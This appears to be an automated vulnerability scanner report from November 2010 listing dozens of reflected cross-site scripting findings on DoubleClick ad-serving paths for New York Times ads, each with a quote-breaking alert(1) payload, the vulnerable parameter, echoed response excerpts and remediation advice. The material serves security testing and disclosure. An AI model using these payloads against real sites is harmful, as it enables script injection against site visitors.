document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; v ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d704d'-alert(1)-'065e3ddce1 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d4a8"-alert(1)-"bf65b757742 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:09 GMT Expires: Mon, 15 Nov 2010 07:25:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6109
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae97'-alert(1)-'f24b1a0321 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:14 GMT Expires: Mon, 15 Nov 2010 07:25:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6103
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321http://personalsavings.americanexpress.com/savings-product.html\"> ...[SNIP]...
4.52. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N553.newyorktimes.com/B4763885.2
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a188e"-alert(1)-"43fe46b40e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:18 GMT Expires: Mon, 15 Nov 2010 07:25:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6122
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH ...[SNIP]...
4.53. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N553.newyorktimes.com/B4763885.2
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b4d'-alert(1)-'76af0dd89ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4522"-alert(1)-"26b2214d3e was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92149'-alert(1)-'093ff1d54f7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41333'-alert(1)-'81ced2474ac was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e466c"-alert(1)-"f5bbc38d216 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c3e'-alert(1)-'cdc68db4077 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 300ba"-alert(1)-"8f69fbdd3e9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:01 GMT Expires: Mon, 15 Nov 2010 07:25:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6118
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a5ea"-alert(1)-"c7fe987232 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:34 GMT Expires: Mon, 15 Nov 2010 07:24:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6114
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "nev ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c216'-alert(1)-'68576e4d92 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25dd'-alert(1)-'da387dc9d56 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce708"-alert(1)-"1dc8e459cae was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:43 GMT Expires: Mon, 15 Nov 2010 07:24:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6107
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c41c8"-alert(1)-"ac3f17478db was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:52 GMT Expires: Mon, 15 Nov 2010 07:24:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6118
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f06'-alert(1)-'d4d6ba4e70a was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea110'-alert(1)-'4a1a8ea4008 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a35e4"-alert(1)-"75f9009f3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1e6e"-alert(1)-"4b69fadcfd6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcal ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb391'-alert(1)-'9f92add2e4d was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5a0"-alert(1)-"672f1f4bd was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6420
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 983a0'-alert(1)-'9af9ccbb6b9 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5467f'-alert(1)-'9ed5241a6ce was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6cehttp://www.xc4.is\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a03"-alert(1)-"022abc0060 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6421
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH ...[SNIP]...
4.74. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N636.276948.NYTIMES/B4871537.31
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c453b'-alert(1)-'81b54708230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6440
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1http://www.xc4.is\"> ...[SNIP]...
4.75. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N636.276948.NYTIMES/B4871537.31
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ab1"-alert(1)-"63e4c9f6674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6440
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var win ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8210f'-alert(1)-'afe3257d6a1 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81584"-alert(1)-"f1713590b03 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 919b0"-alert(1)-"47f06942a38 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
